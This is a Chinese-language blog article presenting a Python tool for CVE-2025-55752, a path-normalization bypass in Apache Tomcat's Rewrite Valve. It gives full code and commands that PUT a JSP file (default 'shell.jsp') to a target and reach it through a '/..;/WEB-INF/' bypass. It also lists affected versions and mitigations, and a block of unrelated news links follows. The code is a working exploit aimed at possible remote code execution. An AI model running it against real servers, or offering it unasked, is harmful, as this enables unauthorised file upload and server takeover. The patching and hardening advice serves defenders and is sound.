CVE-2025-55752 Tomcat 路径绕过与漏洞检测工具详解
CVE-2025-55752 Tomcat 路径绕过与漏洞检测工具项目描述本工具是一个专门用于检测和验证 Apache Tomcat 服务器是否存在 CVE-2025-55752 漏洞的安全脚本。该漏洞是由于重写阀门Rewrite Valve与规范化处理存在缺陷导致攻击者可以绕过路径保护机制访问或上传文件到受保护目录如/WEB-INF/。如果服务器启用了 HTTP PUT 方法此漏洞可能导致远程代码执行RCE。功能特性漏洞检测自动化检测目标 Tomcat 服务器是否存在路径绕过漏洞文件上传测试支持通过 HTTP PUT 方法上传测试文件到目标服务器路径绕过验证利用..;序列绕过 URL 规范化检查验证对受保护目录的访问灵活配置支持自定义上传文件名和 payload 内容SSL 选项提供 SSL 证书验证的开关选项独立检查模式支持仅进行路径绕过检查而不上传文件安装指南系统要求Python 3.xrequests库安装步骤克隆或下载脚本文件gitclonerepository-urlcdCVE-2025-55752安装必要的 Python 依赖pipinstallrequests urllib3可选配置环境确保 Python 环境已正确配置如有代理需求请配置相应的网络设置使用说明基本用法1. 仅检查路径绕过漏洞python3 CVE-2025-55752.py http://target:8080 --check此命令仅测试目标服务器是否存在路径绕过漏洞不进行文件上传。2. 完整漏洞检测包含上传和验证python3 CVE-2025-55752.py http://target:8080此命令将尝试上传一个测试 JSP 文件并验证是否能通过路径绕过访问该文件。3. 自定义文件名和 payloadpython3 CVE-2025-55752.py http://target:8080 --filename exploit.jsp --payload% out.println(PWNED); %使用自定义的文件名和 payload 内容进行测试。4. 禁用 SSL 证书验证python3 CVE-2025-55752.py https://target:8443 --no-ssl-verify对于使用自签名证书的 HTTPS 目标使用此选项禁用 SSL 验证。参数说明url目标服务器的基础 URL必需需包含http://或https://--filename上传的文件名默认为shell.jsp--payload上传的文件内容默认为% out.println(Bypassed!); %--check仅检查路径绕过不进行文件上传--no-ssl-verify禁用 SSL 证书验证输出说明[]表示成功或发现漏洞[-]表示失败或未发现漏洞[!]表示发生错误核心代码1. 主程序入口与参数解析defmain():parserargparse.ArgumentParser(descriptionCVE-2025-55752 Exploit Detection Tool)parser.add_argument(url,helpTarget base URL (e.g., http://127.0.0.1:8080))parser.add_argument(--filename,defaultshell.jsp,helpFilename to upload (default: shell.jsp))parser.add_argument(--payload,default% out.println(\Bypassed!\); %,helpPayload content to upload)parser.add_argument(--check,actionstore_true,helpOnly check for path bypass without uploading)parser.add_argument(--no-ssl-verify,actionstore_true,helpDisable SSL certificate verification)argsparser.parse_args()print(BANNER)verify_sslnotargs.no_ssl_verifyifnotargs.url.startswith(http):print([-] Please include http:// or https:// in the URL)sys.exit(1)ifargs.check:check_access(args.url,f/WEB-INF/{args.filename},verify_ssl)else:uploaded_pathattempt_put_upload(args.url,args.filename,args.payload,verify_ssl)ifuploaded_path:check_access(args.url,f/WEB-INF/{args.filename},verify_ssl)if__name____main__:main()代码说明使用argparse模块解析命令行参数验证 URL 格式确保包含协议头根据--check参数选择执行模式仅检查或完整测试控制 SSL 验证开关2. 文件上传函数defattempt_put_upload(target,filename,payload,verify_ssl):upload_pathf/{filename}urlf{target}{upload_path}try:print(f[] Attempting to upload payload to:{url})responserequests.put(url,datapayload,verifyverify_ssl,timeout10)ifresponse.status_codein[200,201,204]:print(f[] Upload successful! Response code:{response.status_code})returnupload_pathelse:print(f[-] Upload failed! Response code:{response.status_code})returnNoneexceptExceptionase:print(f[!] Upload error:{e})returnNone代码说明使用 HTTP PUT 方法上传文件到目标服务器构造完整的上传 URL检查响应状态码200/201/204 表示上传成功添加超时设置防止长时间等待异常处理确保程序稳定性3. 路径绕过检查函数defcheck_access(target,path,verify_ssl):bypass_pathf/..;{path}urlf{target}{bypass_path}try:print(f[] Checking access to:{url})responserequests.get(url,verifyverify_ssl,timeout10)ifresponse.status_code200:print([] Bypass successful! Target may be vulnerable.)returnTrueelse:print(f[-] Access denied or not vulnerable (HTTP{response.status_code}).)returnFalseexceptExceptionase:print(f[!] Access check error:{e})returnFalse代码说明利用..;序列构造路径绕过 URL使用 HTTP GET 方法尝试访问受保护路径响应状态码 200 表示绕过成功目标可能存在漏洞添加详细的日志输出便于调试和分析4. 初始化与安全设置importrequestsimportargparseimporturllib3importsysfromurllib.parseimportquote urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)BANNER CVE-2025-55752 Tomcat Path Bypass Upload Detection Script This tool attempts to exploit a Rewrite Valve normalization bypass to upload a test JSP file into a protected location (like /WEB-INF) and verify if the server is vulnerable to CVE-2025-55752. 代码说明导入必要的 Python 模块禁用 SSL 警告避免输出干扰定义工具横幅显示工具名称和功能介绍使用urllib.parse.quote预备 URL 编码功能虽未在代码中直接使用但为扩展功能预留受影响版本Tomcat 分支受影响版本11.x11.0.0-M1 至 11.0.1010.1.x10.1.0-M1 至 10.1.449.0.x9.0.0-M11 至 9.0.1088.5.x8.5.6 至 8.5.100建议升级到已修复的版本11.0.11、10.1.45 或 9.0.109 及以上版本。漏洞原理CVE-2025-55752 是 Apache Tomcat 中的一个回归漏洞当重写规则将查询参数映射到 URL 时URL 规范化逻辑存在缺陷。攻击者可以利用特定的路径遍历序列如..;绕过内部保护机制访问受限制的目录如/WEB-INF/或/META-INF/。如果服务器启用了 HTTP PUT 方法攻击者可能上传恶意文件并实现远程代码执行。安全建议立即升级将受影响的 Tomcat 版本升级到已修复的版本禁用 HTTP PUT除非必要否则应禁用 HTTP PUT 方法加强重写规则对重写规则中的输入进行严格验证和清理访问控制加强受保护目录的访问控制监控日志监控服务器日志检测可疑的路径遍历或文件上传请求FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ6xNbDhtNlxQOQyXUFbeFK更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

相关新闻

借钱炒股 死的可能性很大!

借钱炒股 死的可能性很大!

“Catching the Swings” on a Marginal Basis Impracticable. From theordinary speculative standpoint, involving purchases on margin and shortsales, this method of operation must be set down as impracticable. Theoutright owner can afford to buy too soon and t…

2026/5/17 3:12:51 阅读更多 →
中文才是终极外挂!中国凭它碾压世界,西方彻底傻眼

中文才是终极外挂!中国凭它碾压世界,西方彻底傻眼

中文才是终极外挂!中国凭它碾压世界,西方彻底傻眼 大家好,今天咱们聊一个被绝大多数人忽略的 “超级武器”—— 中文。 你有没有想过,全世界那么多国家,偏偏只有中国能坐稳世界工厂的位置?有人说是发电量领…

2026/7/3 2:05:55 阅读更多 →
基于大数据的通化市人口老龄化分析平台开题报告

基于大数据的通化市人口老龄化分析平台开题报告

基于大数据的通化市人口老龄化分析平台开题报告 一、选题背景与意义 (一)选题背景 随着我国社会经济的持续发展、医疗保障体系的不断完善以及人口生育政策的调整,人口老龄化已成为不可逆转的社会发展趋势,对社会结构、经济发展、公…

2026/7/3 16:38:10 阅读更多 →

最新新闻

真人克隆口播小程序开发全攻略:AI数字人系统源码架构解析

真人克隆口播小程序开发全攻略:AI数字人系统源码架构解析

随着生成式AI不断发展,"真人克隆口播"正在成为短视频、自媒体、电商、知识付费等行业的新生产力。过去,一条视频需要真人出镜、反复拍摄、后期剪辑,如今借助AI数字人技术,只需录制少量素材,即可快速生成高度…

2026/7/5 6:31:52 阅读更多 →
抖音内容高效采集工具:如何用开源方案解决批量下载与管理的技术挑战

抖音内容高效采集工具:如何用开源方案解决批量下载与管理的技术挑战

抖音内容高效采集工具:如何用开源方案解决批量下载与管理的技术挑战 【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and browser f…

2026/7/5 6:29:52 阅读更多 →
JMeter-Bzm-Plugins进阶指南:从安装部署到性能调优实战

JMeter-Bzm-Plugins进阶指南:从安装部署到性能调优实战

1. 项目概述:为什么Bzm-Plugins是JMeter进阶的必经之路如果你已经用了一段时间的JMeter,从录制几个简单的HTTP请求,到学会使用CSV参数化、正则表达式提取器,再到搭建分布式压测环境,你可能会觉得这个工具已经玩得差不多…

2026/7/5 6:27:51 阅读更多 →
包装线跨品牌通讯:EtherCAT 转 ProfiNet 网关实现 NJ501 读取 1734-AENT 计数与温度

包装线跨品牌通讯:EtherCAT 转 ProfiNet 网关实现 NJ501 读取 1734-AENT 计数与温度

一、项目背景与挑战某食品包装企业新建一条高速枕式包装生产线,用于糕点、面包等食品的自动化包装,产线要求稳定运行、数据实时采集、包装精度与效率同步提升。该生产线采用欧姆龙NJ501型EtherCAT主站PLC作为核心控制器,负责协调包装机、输送…

2026/7/5 6:25:51 阅读更多 →
本地AI智能体组合:Hermes与Codex打造自动化“赛博牛马”

本地AI智能体组合:Hermes与Codex打造自动化“赛博牛马”

🚀 30款热门AI模型一站整合,DeepSeek/GLM/Qwen 随心用,限时 5 折。 👉 点击领海量免费额度 这次我们来看一个关于 Hermes 和 Codex 的本地 AI 智能体组合方案。这个组合的核心目标,是打造一个能够长时间、自动化处理…

2026/7/5 6:19:50 阅读更多 →
FreeCAD源码分析: Selection Model

FreeCAD源码分析: Selection Model

本文从业务分析与逻辑推理出发,旨在研究FreeCAD中Selection Model的相关实现原理。 注1:限于研究水平,分析难免不当,欢迎批评指正。 注2:文章内容会不定期更新。 一、概述 在图形交互系统中,“选择”通常是用户意图进入系统内部处理链路的第一个明确动作。对于 FreeCA…

2026/7/5 6:17:50 阅读更多 →

日新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻